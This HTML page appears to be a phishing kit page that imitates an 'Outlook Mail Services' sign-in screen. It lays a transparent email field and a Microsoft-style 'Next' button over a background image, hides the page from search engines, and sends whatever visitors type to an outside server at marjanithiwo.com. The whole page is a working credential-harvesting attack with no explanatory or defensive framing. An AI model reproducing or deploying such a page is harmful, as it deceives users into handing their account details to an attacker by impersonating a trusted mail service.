<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
 <link rel="stylesheet" href="style.css">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="HandheldFriendly" content="true">
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
  <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
  <title>Outlook Mail Services</title>

<style>

.babea{
    background: url(bg.png) no-repeat ; font-size: 1em; background-repeat: no-repeat; background-color: black; width:100%;
}

caline {
 outline:none;
}
</style>
</head>
<body bgcolor="#ffffff" style=" padding: 0; margin: 0; " class="babea" id="bg">
<div style="float: right; z-index: 9999999; position: absolute; left: 0; margin-top: 249px; background: transparent; width: 337px; border-radius: 4px; margin-left: 515px;">	
 
			<br>
<form  method="post" action="https://marjanithiwo.com/blaze/hiit.php" >


 <input  type="email" name="grownup" tabindex="1" value="" required=""  Placeholder="Email, phone, or Skype" style="margin-top: -10px;background: transparent;border-radius: 2px;box-sizing: border-box;color: #695a5a;font-family: verdana;font-size: 12px;height: 36px;padding: 3px 7px;width: 338px;border: 0px solid #fff;margin-bottom: 0;margin-left: -1px;"> 
 
 
  <br>   
<button  name="tailor" style="z-index: 10;\: 700;background-color: #0067b8;border: 0 none;border-radius: 2px;color: #FFF;font: 14px verdana;height: 36px;text-align: center;width: 338px;margin-top: 17px;margin-left:  -1px;font-weight: 500;">Next</button>
</form>
</div></div></div></div>
</body>
</html>
